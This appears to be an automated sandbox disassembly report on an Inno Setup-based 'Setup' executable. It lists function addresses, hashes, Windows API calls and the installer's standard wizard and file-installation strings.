Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: $!$"$"$#$#$$$$$%$%$'$($)$+$+$,$,$-$-$.$.$/$0$5$9$?$?$@$@$A$B$B$C$D$D$D$D$Empty$F$F$F$G$H$H$H$I$J$J$J$L$L$M$M$N$P$P$Q$R$T$U$V$X$X$Z$[$\$\$]$^$_$`$`$`$a$b$f$g$h$h$i$i$j$j$k$k$l$m$p$s$t$u$u$w$x$z$z${${$|$|$~$~
API String ID: 0-2795155819
Opcode ID: 5a4318596e214696aee3ab528d0062f64cdb4365e81154077c347bc7418ed660
Instruction ID: 81acabab249e7e40c03ecdf72cb060ad541ac398238914e9cb41b6548c54b0eb
Opcode Fuzzy Hash: 5a4318596e214696aee3ab528d0062f64cdb4365e81154077c347bc7418ed660
Instruction Fuzzy Hash: 6413B07260C7C08AD3358B39889439FBBD2AFD6364F088A6DD5E9873D2D6788445CB53

Function 004850D8 Relevance: 105.4, Strings: 84, Instructions: 424COMMON

Download Yara Rule

Strings

YesRadio, xrefs: 004853F0
PasswordEditLabel, xrefs: 004852D3
Bevel1, xrefs: 0048537E
SelectDirLabel, xrefs: 004854FA
PreparingErrorBitmapImage, xrefs: 004855B8
UserInfoSerialLabel, xrefs: 004855F1
UserInfoPage, xrefs: 004851B6
PreparingLabel, xrefs: 004855CB
CancelButton, xrefs: 004850E5
IncTopDecHeight, xrefs: 004856FE
WelcomePage, xrefs: 00485144
PasswordEdit, xrefs: 004852C0
SelectTasksLabel, xrefs: 00485533
InstallingPage, xrefs: 0048523B
WizardBitmapImage2, xrefs: 00485416
PasswordLabel, xrefs: 004852AD
InnerPage, xrefs: 00485157
SelectTasksPage, xrefs: 00485202
DiskSpaceLabel, xrefs: 00485261
MainPanel, xrefs: 0048536B
SelectStartMenuFolderLabel, xrefs: 0048550D
SelectDirBitmapImage, xrefs: 00485663
NextButton, xrefs: 004850F8
PasswordPage, xrefs: 00485190
LicenseLabel1, xrefs: 0048543C
StatusLabel, xrefs: 004854C1
WizardSmallBitmapImage, xrefs: 004853B7
NoRadio, xrefs: 00485403
SelectDirBrowseLabel, xrefs: 00485689
SelectDirPage, xrefs: 004851C9
UserInfoNameEdit, xrefs: 0048557F
UserInfoSerialEdit, xrefs: 00485604
PreparingYesRadio, xrefs: 004856AF
OuterNotebook, xrefs: 0048511E
AdjustLabelHeight, xrefs: 004856ED
GroupEdit, xrefs: 00485287
TasksList, xrefs: 00485617
BackButton, xrefs: 0048510B
SelectComponentsPage, xrefs: 004851DC
DirEdit, xrefs: 00485274
UserInfoOrgEdit, xrefs: 004855A5
SelectGroupBitmapImage, xrefs: 00485676
WelcomeLabel1, xrefs: 00485332
PreparingNoRadio, xrefs: 004856C2
DirBrowseButton, xrefs: 0048563D
SelectStartMenuFolderBrowseLabel, xrefs: 0048569C
NoIconsCheck, xrefs: 0048529A
WelcomeLabel2, xrefs: 00485429
FinishedLabel, xrefs: 004853DD
ComponentsList, xrefs: 00485488
InfoAfterMemo, xrefs: 00485462
ReadyMemo, xrefs: 004852E6
InfoAfterClickLabel, xrefs: 00485475
ProgressGauge, xrefs: 004854E7
InfoBeforeMemo, xrefs: 00485345
PrevAppDir, xrefs: 0048570A
InfoAfterPage, xrefs: 0048524E
RunList, xrefs: 0048562A
CurPageID, xrefs: 004856D5
PageNameLabel, xrefs: 00485391
PreparingPage, xrefs: 00485228
WizardBitmapImage, xrefs: 0048531F
ReadyLabel, xrefs: 004853CA
FinishedHeadingLabel, xrefs: 004855DE
LicensePage, xrefs: 0048517D
BeveledLabel, xrefs: 004854AE
LicenseMemo, xrefs: 0048544F
Bevel, xrefs: 0048530C
InfoBeforeClickLabel, xrefs: 00485358
InnerNotebook, xrefs: 00485131
UserInfoOrgLabel, xrefs: 00485592
SelectComponentsLabel, xrefs: 00485520
InfoBeforePage, xrefs: 004851A3
UserInfoNameLabel, xrefs: 0048556C
LicenseNotAcceptedRadio, xrefs: 00485559
GroupBrowseButton, xrefs: 00485650
ReadyPage, xrefs: 00485215
PageDescriptionLabel, xrefs: 004853A4
FilenameLabel, xrefs: 004854D4
SelectProgramGroupPage, xrefs: 004851EF
ComponentsDiskSpaceLabel, xrefs: 0048549B
LicenseAcceptedRadio, xrefs: 00485546
FinishedPage, xrefs: 0048516A
TypesCombo, xrefs: 004852F9

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID: AdjustLabelHeight$BackButton$Bevel$Bevel1$BeveledLabel$CancelButton$ComponentsDiskSpaceLabel$ComponentsList$CurPageID$DirBrowseButton$DirEdit$DiskSpaceLabel$FilenameLabel$FinishedHeadingLabel$FinishedLabel$FinishedPage$GroupBrowseButton$GroupEdit$IncTopDecHeight$InfoAfterClickLabel$InfoAfterMemo$InfoAfterPage$InfoBeforeClickLabel$InfoBeforeMemo$InfoBeforePage$InnerNotebook$InnerPage$InstallingPage$LicenseAcceptedRadio$LicenseLabel1$LicenseMemo$LicenseNotAcceptedRadio$LicensePage$MainPanel$NextButton$NoIconsCheck$NoRadio$OuterNotebook$PageDescriptionLabel$PageNameLabel$PasswordEdit$PasswordEditLabel$PasswordLabel$PasswordPage$PreparingErrorBitmapImage$PreparingLabel$PreparingNoRadio$PreparingPage$PreparingYesRadio$PrevAppDir$ProgressGauge$ReadyLabel$ReadyMemo$ReadyPage$RunList$SelectComponentsLabel$SelectComponentsPage$SelectDirBitmapImage$SelectDirBrowseLabel$SelectDirLabel$SelectDirPage$SelectGroupBitmapImage$SelectProgramGroupPage$SelectStartMenuFolderBrowseLabel$SelectStartMenuFolderLabel$SelectTasksLabel$SelectTasksPage$StatusLabel$TasksList$TypesCombo$UserInfoNameEdit$UserInfoNameLabel$UserInfoOrgEdit$UserInfoOrgLabel$UserInfoPage$UserInfoSerialEdit$UserInfoSerialLabel$WelcomeLabel1$WelcomeLabel2$WelcomePage$WizardBitmapImage$WizardBitmapImage2$WizardSmallBitmapImage$YesRadio
API String ID: 0-2056260878
Opcode ID: bd361596467bd602afeabe70ba190c3251fcacbc9d9c3dd50e16874470634172
Instruction ID: d94e5cffa489ca3956f9ab8c75bbfab5d37880681f51beab8e0f389cd24941eb
Opcode Fuzzy Hash: bd361596467bd602afeabe70ba190c3251fcacbc9d9c3dd50e16874470634172
Instruction Fuzzy Hash: A7C1E434355B61539B59B9792C9362E08829B85B243F2DC3F790BEBB87CA6CD906434C

Function 0046F7F0 Relevance: 78.0, APIs: 4, Strings: 40, Instructions: 956COMMON

Download Yara Rule

Strings

Skipping due to "onlyifdoesntexist" flag., xrefs: 0046FB16
.tmp, xrefs: 004700FF
Version of our file: (none), xrefs: 0046FC44
Incrementing shared file count (32-bit)., xrefs: 004706C6
Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 0046FE0C
Installing into GAC, xrefs: 00470835
Version of existing file: %u.%u.%u.%u, xrefs: 0046FCC4
Dest file is protected by Windows File Protection., xrefs: 0046FA35
Skipping due to "onlyifdestfileexists" flag., xrefs: 00470042
Time stamp of our file: (failed to read), xrefs: 0046FAEF
Stripped read-only attribute., xrefs: 0047000F
, xrefs: 0046FD17, 0046FEE8, 0046FF66
Existing file has a later time stamp. Skipping., xrefs: 0046FF17
Failed to strip read-only attribute., xrefs: 0047001B
Non-default bitness: 64-bit, xrefs: 0046F9F7
Time stamp of existing file: %s, xrefs: 0046FB73
Uninstaller requires administrator: %s, xrefs: 004702BD
Same version. Skipping., xrefs: 0046FE2D
Dest filename: %s, xrefs: 0046F9DC
@, xrefs: 0046F8F8
Time stamp of our file: %s, xrefs: 0046FAE3
Time stamp of existing file: (failed to read), xrefs: 0046FB7F
User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0046FFDE
Will register the file (a type library) later., xrefs: 00470634
InUn, xrefs: 0047028D
Same time stamp. Skipping., xrefs: 0046FE9D
Version of our file: %u.%u.%u.%u, xrefs: 0046FC38
Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 0046FE18
Dest file exists., xrefs: 0046FB03
User opted not to overwrite the existing file. Skipping., xrefs: 0046FF95
Existing file's SHA-1 hash matches our file. Skipping., xrefs: 0046FDFD
-- File entry --, xrefs: 0046F843
Incrementing shared file count (64-bit)., xrefs: 004706AD
Version of existing file: (none), xrefs: 0046FE42
Couldn't read time stamp. Skipping., xrefs: 0046FE7D
Installing the file., xrefs: 00470051
Non-default bitness: 32-bit, xrefs: 0046FA03
Will register the file (a DLL/OCX) later., xrefs: 00470640
Existing file is a newer version. Skipping., xrefs: 0046FD4A
Existing file is protected by Windows File Protection. Skipping., xrefs: 0046FF34

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
API String ID: 0-4021121268
Opcode ID: 75cad54fbe9c1750f872c63845472026db43d5dc9685d4a6926a5ad71945362d
Instruction ID: e8792a80d11ba53c366901de372cfc6d7401bc2553ef03097421f90694f1f82e
Opcode Fuzzy Hash: 75cad54fbe9c1750f872c63845472026db43d5dc9685d4a6926a5ad71945362d
Instruction Fuzzy Hash: 19927230A04248DFCB11DFA5D445BDDBBB5AF05308F5480ABE848BB392D7789E49CB5A

Function 00457DE8 Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 186pipeprocessfileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00457E4F
QueryPerformanceCounter.KERNEL32(00000000,00000000,004580E2,?,?,00000000,00000000,?,004587DE,?,00000000,00000000), ref: 00457E58
GetSystemTimeAsFileTime.KERNEL32(00000000,00000000), ref: 00457E62
GetCurrentProcessId.KERNEL32(?,00000000,00000000,004580E2,?,?,00000000,00000000,?,004587DE,?,00000000,00000000), ref: 00457E6B
CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00457EE1
GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,00000000,00000000), ref: 00457EEF
CreateFileA.KERNEL32(00000000,C0000000,00000000,00498B04,00000003,00000000,00000000,00000000,0045809E), ref: 00457F37
SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045808D,?,00000000,C0000000,00000000,00498B04,00000003,00000000,00000000,00000000,0045809E), ref: 00457F70

Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3

CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458019
CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045804F
CloseHandle.KERNEL32(000000FF,00458094,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458087

Part of subcall function 00452B0C: GetLastError.KERNEL32(00000000,0045357D,00000005,00000000,004535B2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496A6D,00000000), ref: 00452B0F

Strings

Helper process PID: %u, xrefs: 0045806C
Starting 64-bit helper process., xrefs: 00457E1D
64-bit helper EXE wasn't extracted, xrefs: 00457E43
SetNamedPipeHandleState, xrefs: 00457F79
Cannot utilize 64-bit features on this version of Windows, xrefs: 00457E30
CreateProcess, xrefs: 00458022
CreateFile, xrefs: 00457F45
D, xrefs: 00457F92
helper %d 0x%x, xrefs: 00457FF8
CreateNamedPipe, xrefs: 00457EFF
i, xrefs: 00457FCC
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x, xrefs: 00457EB7

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
API String ID: 770386003-3271284199
Opcode ID: 9f4ddec2d6de6d6a7faf4e2e0369fae5f4c26755ff513abdd51342afaaa2cd46
Instruction ID: b563b2c895ae2dba4144f0cf50b55dbfcef9f20904619bb7072887bec0bf6eb4
Opcode Fuzzy Hash: 9f4ddec2d6de6d6a7faf4e2e0369fae5f4c26755ff513abdd51342afaaa2cd46
Instruction Fuzzy Hash: CA713270A047449EDB10DF69CC46B9EBBF4AB05705F1084BAF908FB282DB785948CF69

Function 0045A994 Relevance: 39.3, APIs: 7, Strings: 15, Instructions: 832COMMON

Download Yara Rule

Strings

Process exit code: %u, xrefs: 0045AC69, 0045AD78
utUserDefined:, xrefs: 0045B138
Starting the uninstallation process., xrefs: 0045A9DD
ShellExecuteEx failed (%d)., xrefs: 0045AD48
$%x, xrefs: 0045B530
Running ShellExec filename: , xrefs: 0045AC87
Skipping RunOnceId "%s" filename: %s, xrefs: 0045ADCC
Running ShellExec parameters: , xrefs: 0045ACB6
File doesn't exist. Skipping., xrefs: 0045AC78
CreateProcess failed (%d)., xrefs: 0045AC32
Running Exec filename: , xrefs: 0045AB67
n_I, xrefs: 0045B621, 0045B697, 0045B637, 0045B658, 0045B218
File/directory doesn't exist. Skipping., xrefs: 0045AD84
Unregistering font: %s, xrefs: 0045AFB9
Running Exec parameters: , xrefs: 0045AB96

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Directory$CurrentSystem
String ID: $%x$CreateProcess failed (%d).$File doesn't exist. Skipping.$File/directory doesn't exist. Skipping.$Process exit code: %u$Running Exec filename: $Running Exec parameters: $Running ShellExec filename: $Running ShellExec parameters: $ShellExecuteEx failed (%d).$Skipping RunOnceId "%s" filename: %s$Starting the uninstallation process.$Unregistering font: %s$n_I$utUserDefined:
API String ID: 1285235121-3932965658
Opcode ID: 2d6163835589659f2d48889a195806db806d9fae4e50a0e0f8d2291a19646505
Instruction ID: 001e8c62ec85fd70a3f0d299895e6fdd93213fcc25f8e70ce73690a49674d13b
Opcode Fuzzy Hash: 2d6163835589659f2d48889a195806db806d9fae4e50a0e0f8d2291a19646505
Instruction Fuzzy Hash: 07725230A042199FDB20DF64C985B9DB7B1BF05309F1481DAE848A7393DB789E89CF59

Function 00481FF4 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00482005
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00482012
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00482028
GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00482034
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00482055
GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00482068
GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0048206E
GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00482085

Strings

GetNativeSystemInfo, xrefs: 0048200C
RegDeleteKeyExA, xrefs: 0048205E
IsWow64Process, xrefs: 00482022
advapi32.dll, xrefs: 00482063
kernel32.dll, xrefs: 00482000
GetSystemWow64DirectoryA, xrefs: 0048204F

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressProc$HandleModule$CurrentInfoProcessSystem
String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
API String ID: 2195675749-2623177817
Opcode ID: 6945a3241c53611a9a9c52540b1d01859de8655b83a26a4f6fc6e26a22c2bdaa
Instruction ID: 17f89ef16513d558d40e50a148d83660b0106b55f934bc3655b4eb6cfd74668a
Opcode Fuzzy Hash: 6945a3241c53611a9a9c52540b1d01859de8655b83a26a4f6fc6e26a22c2bdaa
Instruction Fuzzy Hash: CA11AFB5009702D9CA2073754E49B6F29888B13714F180D3B6E8076283CAFD8844DB7F

Function 0045C3E0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 182libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32 ref: 0045C3FA
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045C41A
GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045C427
GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045C434
GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045C442

Part of subcall function 0045C2E8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C387,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C361

AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C635,?,?,00000000), ref: 0045C4FB
GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C635,?,?,00000000), ref: 0045C504

Strings

W, xrefs: 0045C512
SetNamedSecurityInfoW, xrefs: 0045C42E
SetEntriesInAclW, xrefs: 0045C43C
GetNamedSecurityInfoW, xrefs: 0045C421
advapi32.dll, xrefs: 0045C415

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
API String ID: 59345061-4263478283
Opcode ID: d6eef5a1a17f0085931c2f89727b54f6d0ea067fbfb95fe1386380f9826cf4fc
Instruction ID: 2324ee668b9984b5a17f8dfa8b7107ea71667c1f280dda851e0a9f9f44b51649
Opcode Fuzzy Hash: d6eef5a1a17f0085931c2f89727b54f6d0ea067fbfb95fe1386380f9826cf4fc
Instruction Fuzzy Hash: F85174B1900308EFDB10DFD9C881BAEB7B8EB4D715F14806AF905B7241D6789A45CFA9

Function 00477120 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00476F8C: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,?,?,?,?,?,00477150,00000000,0047726E,?,?,-00000010,?), ref: 00476FA5
Part of subcall function 00476F8C: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476FAB
Part of subcall function 00476F8C: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,?,?,?,?,?,00477150,00000000,0047726E,?,?,-00000010,?), ref: 00476FBE
Part of subcall function 00476F8C: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,?,?,?,?,?), ref: 00476FE8
Part of subcall function 00476F8C: CloseHandle.KERNEL32(00000000,?,?,?,?,00477150,00000000,0047726E,?,?,-00000010,?), ref: 00477006

Part of subcall function 00477064: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004770F6,?,?,?,?,?,00477158,00000000,0047726E,?,?,-00000010,?), ref: 00477094

ShellExecuteEx.SHELL32(0000003C), ref: 004771A8
GetLastError.KERNEL32(00000000,0047726E,?,?,-00000010,?), ref: 004771B1
MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004771FE
GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00477222
CloseHandle.KERNEL32(00000000,00477253,00000000,00000000,000000FF,000000FF,00000000,0047724C,?,00000000,0047726E,?,?,-00000010,?), ref: 00477246

Strings

ShellExecuteEx returned hProcess=0, xrefs: 004771D2
<, xrefs: 00477167
runas, xrefs: 00477175
GetExitCodeProcess, xrefs: 0047722B
MsgWaitForMultipleObjects, xrefs: 0047720B
ShellExecuteEx, xrefs: 004771C2

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
API String ID: 883996979-221126205
Opcode ID: d2dffa1d813f9d89dbe0e34b4a956dc4f34d35bcfd67651384d71dd5efddda46
Instruction ID: 875c3796c046624c2228b02c90a975a84e6b5ea672051c8ab2535e6639634d95
Opcode Fuzzy Hash: d2dffa1d813f9d89dbe0e34b4a956dc4f34d35bcfd67651384d71dd5efddda46
Instruction Fuzzy Hash: EC316570A04608AEDB11EFEAC841ADEB7B8EF05314F9084BBF518E7392D77C59058B59

Function 0042286C Relevance: 18.3, APIs: 12, Instructions: 255windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00000223,00000000,00000000), ref: 00422A04
ShowWindow.USER32(00000000,00000003,?,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSendShowWindow
String ID:
API String ID: 1631623395-0
Opcode ID: 397c1da49a847cce345e91f39d656857a6226a484a3f5f33d752824825376d14
Instruction ID: 39dda2673d0f757005a7c2ebbeab04d2226afc2b16c541db07efabb99d57c27a
Opcode Fuzzy Hash: 397c1da49a847cce345e91f39d656857a6226a484a3f5f33d752824825376d14
Instruction Fuzzy Hash: 8B916171B04214BFD710EFA9DA86F9D77F4AB04314F5500B6F904AB3A2CB78AE409B58

Function 0048600C Relevance: 17.6, Strings: 14, Instructions: 76COMMON

Download Yara Rule

Strings

Bevel1, xrefs: 004860B1
InnerPage, xrefs: 0048602C
StatusLabel, xrefs: 004860C4
ProgressBar, xrefs: 004860D7
OuterNotebook, xrefs: 00486019
WizardSmallBitmapImage, xrefs: 0048609E
PageDescriptionLabel, xrefs: 0048608B
MainPanel, xrefs: 00486065
PageNameLabel, xrefs: 00486078
InnerNotebook, xrefs: 0048603F
Bevel, xrefs: 004860FD
InstallingPage, xrefs: 00486052
CancelButton, xrefs: 00486110
BeveledLabel, xrefs: 004860EA

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID: Bevel$Bevel1$BeveledLabel$CancelButton$InnerNotebook$InnerPage$InstallingPage$MainPanel$OuterNotebook$PageDescriptionLabel$PageNameLabel$ProgressBar$StatusLabel$WizardSmallBitmapImage
API String ID: 0-4094957626
Opcode ID: b93c31c45e68309c6fc3ece15199868ce94bea3fc054b51b24a6397c44f5753f
Instruction ID: 610e7caa26b04fa38a3ba9d69a31c3a58bea6e258a9da26b0fd240cce9cd88d2
Opcode Fuzzy Hash: b93c31c45e68309c6fc3ece15199868ce94bea3fc054b51b24a6397c44f5753f
Instruction Fuzzy Hash: 18111430355B60139B88797D1C9761F08815B897197F29C7F3A1BEB78BCA6CD805430D

Function 00466BB8 Relevance: 15.7, APIs: 4, Strings: 4, Instructions: 1657windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00493F30: GetWindowRect.USER32(00000000), ref: 00493F46

LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00466F87

Part of subcall function 0041D6C0: GetObjectA.GDI32(?,00000018,00466FA1), ref: 0041D6EB

